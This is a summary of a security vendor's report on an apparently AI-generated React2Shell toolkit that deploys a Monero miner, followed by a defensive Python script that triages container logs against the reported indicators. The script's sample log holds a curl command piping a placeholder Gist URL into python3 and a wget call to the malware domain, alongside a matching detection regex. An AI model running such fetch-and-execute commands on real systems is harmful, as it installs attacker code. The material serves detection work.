Darktrace has identified an AI/LLM-generated malware sample that targets its CloudyPots environment by exploiting a React2Shell vulnerability, illustrating how large language models can accelerate the production of exploitation tools for low‑skill attackers.
The report describes an attack chain starting with an AI‑generated Docker-based intrusion into a honeypot, where a container named “python-metrics-collector” is spawned and equipped with curl, wget and Python, before downloading Python packages and executing a script from a GitHub Gist linked to a user who has since been banned.
The well‑documented payload is a React2Shell exploitation toolkit designed to achieve remote code execution and deploy a Monero miner (XMRig) through a multi‑stage, obfuscated process that includes a Next.js server component payload and a crafted command execution path.
Darktrace notes that the operation infected at least 91 hosts. The spreader IP (49.36.33[.]11) is registered to a residential ISP in India, and a central spreader server was likely deployed by the attacker, though the analysis confirms that this sample contains no Docker spreader. Indicators of compromise include the malware host domain smplu[.]link and a set of associated hashes.
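For defenders, the indicators named in this summary can be matched against container-creation telemetry. The following is an added example, not code from Darktrace's report: the JSON event schema (`name`, `src_ip`, `cmd`), the sample lines and the Gist host pattern are assumptions made for illustration.

```python
import json
import re

# Indicators as printed in the summary (defanged); refang() makes them comparable.
REPORTED = {"container_name": "python-metrics-collector",
            "domain": "smplu[.]link", "spreader_ip": "49.36.33[.]11"}

def refang(text):
    return text.replace("[.]", ".")

IOCS = {key: refang(value) for key, value in REPORTED.items()}
# Match the domain as a whole host: subdomains allowed, look-alike names rejected.
DOMAIN_RE = re.compile(r"(?<![\w-])" + re.escape(IOCS["domain"]) + r"(?![\w.-])", re.I)
# Behaviour from the described chain: curl/wget fetching from a GitHub Gist (assumed host form).
GIST_RE = re.compile(r"\b(curl|wget)\b[^|;&]*gist\.github(usercontent)?\.com", re.I)

def triage(event):
    """Return the reasons one container-create event matches the summary."""
    cmd = " ".join(event.get("cmd", []))
    checks = [
        ("container_name", event.get("name") == IOCS["container_name"]),
        ("spreader_ip", event.get("src_ip") == IOCS["spreader_ip"]),
        ("domain", bool(DOMAIN_RE.search(refang(cmd)))),
        ("gist_fetch", bool(GIST_RE.search(cmd))),
    ]
    return [name for name, matched in checks if matched]

def scan(log_text):
    """Map 1-based line number -> reasons, skipping lines that are not JSON objects."""
    hits = {}
    for lineno, line in enumerate(log_text.splitlines(), 1):
        try:
            reasons = triage(json.loads(line))
        except (json.JSONDecodeError, AttributeError, TypeError):
            continue
        if reasons:
            hits[lineno] = reasons
    return hits

# Constructed sample events in a hypothetical schema; not taken from the report.
SAMPLE_LOG = """\
{"name": "python-metrics-collector", "src_ip": "203.0.113.7", "cmd": ["sh", "-c", "apt-get install -y curl wget python3"]}
{"name": "web", "src_ip": "198.51.100.4", "cmd": ["nginx", "-g", "daemon off;"]}
{"name": "job-1", "src_ip": "49.36.33.11", "cmd": ["sh", "-c", "curl -s https://gist.githubusercontent.com/EXAMPLE_USER/EXAMPLE_ID/raw | python3"]}
{"name": "job-2", "src_ip": "198.51.100.9", "cmd": ["sh", "-c", "wget http://smplu[.]link/EXAMPLE_PATH"]}
truncated line that is not JSON
"""
```

The container name alone is a weak signal because it is trivially changed; the Gist-fetch pattern catches the behaviour even when the name and addresses differ.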